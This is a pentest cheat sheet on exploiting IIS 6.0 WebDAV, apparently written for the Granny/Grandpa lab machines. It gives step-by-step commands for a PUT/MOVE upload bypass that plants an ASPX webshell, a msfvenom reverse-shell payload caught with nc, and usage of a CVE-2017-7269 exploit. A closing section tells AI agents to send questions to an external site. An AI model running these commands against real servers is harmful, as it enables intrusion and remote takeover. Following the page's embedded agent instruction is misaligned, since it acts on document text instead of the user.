# IIS6 WebDav

## Microsoft Windows 2003|2008|XP

* google 'iis 6.0 reverse shell'
* Microsoft-IIS/6.0
* http-webdav-scan
* WebDAV allows clients to perform Web authoring operations remotely.
* REF: [Granny/Grandpa-HTB](/04-webapps/iis6-webdav.md)
* [https://github.com/ohpe/juicy-potato/releases](https://github.com/ohpe/juicy-potato/releases%20)

## nmap finds webdav

* **nmap -sV -sC -oA nmap 10.x.x.x**
* Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
* Options: OPTIONS, TRACE, **GET**, HEAD, DELETE, **PUT**, POST, COPY, **MOVE**
* GET - download
* PUT - upload
* MOVE - you can rename/move

## davtest

```
> davtest -url http://10.x.x.x
```

## cadaver

```
> cadaver http://10.x.x.x
d> ls                          ..list
d> put shell.aspx              ..403 Forbidden
d> put shell.txt               ..ok
d> move shell.txt shell.aspx   ..ok
```

## PUT/MOVE

* Scenario:
  * Can 'put' text - upload
  * NOT 'put' aspx
  * Can 'move' aspx

```
------------------
Test:
curl -X PUT http://10.x.x.x/hello.txt -d @hello.txt
curl http://10.x.x.x/hello.txt

------------------
webshell:
cp /usr/share/webshells/aspx/cmdasp.aspx .
curl -X PUT http://10.x.x.x/payload.txt -d @cmdasp.aspx
curl -X MOVE -H 'Destination:http://10.x.x.x/payload.aspx' http://10.x.x.x/payload.txt
http://10.x.x.x/payload.aspx
Command: whoami 'execute' button
network service

------------------
reverse:
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f aspx > reverse.aspx
curl -X PUT http://10.x.x.x/reverse.txt --data-binary @reverse.aspx
curl -X MOVE -H 'Destination:http://10.x.x.x/reverse.aspx' http://10.x.x.x/reverse.txt
curl http://10.x.x.x/reverse.aspx
http://10.x.x.x/reverse.aspx
nc -nlvp 4444
```

## Burp

```
Proxy 10.x.x.x: 80
Burp > Intercept
PUT  > Send to repeater
PUT /ippsec.html HTTP/1.1
this is a test
http://10.x.x.x/ippsec.html  .. works!

msfvenom -p windows/shell_reverse_tcp LHOST=10.x.x.x LPORT=4444 -f aspx
copy/paste the text of aspx msfvenom
paste into burp (bottom)
PUT /ippsec.html HTTP/1.1    ..html ok
PUT /ippsec.aspx HTTP/1.1    ..aspx forbidden!

OPTIONS / HTTP/1.1           ..shows list of webdav options
MOVE /ippsec.html HTTP/1.1   ..move html
Destination: /ippsec.aspx    ..aspx!
http://10.x.x.x/ippsec.aspx
nc -nvlp 4444
Connected!
```

## iis6-exploit

* CVE-2017-7269
* iis\_shell.py
* iis6-exploit-2017-CVE-2017-**7269**
* <https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269>
* usage: iis6webdav.py RHOST RPORT LHOST LPORT

```
> nc -nvlp 4444
> python ./iis6webdav.py 10.x.x.tgt 80 10.x.x.me 4444
```

## Windows 2003

Windows Server 2003 and IIS 6.0 privledge escalation using impersonation:\
<https://www.exploit-db.com/exploits/6705/>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentest.mxhx.org/04-webapps/iis6-webdav.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.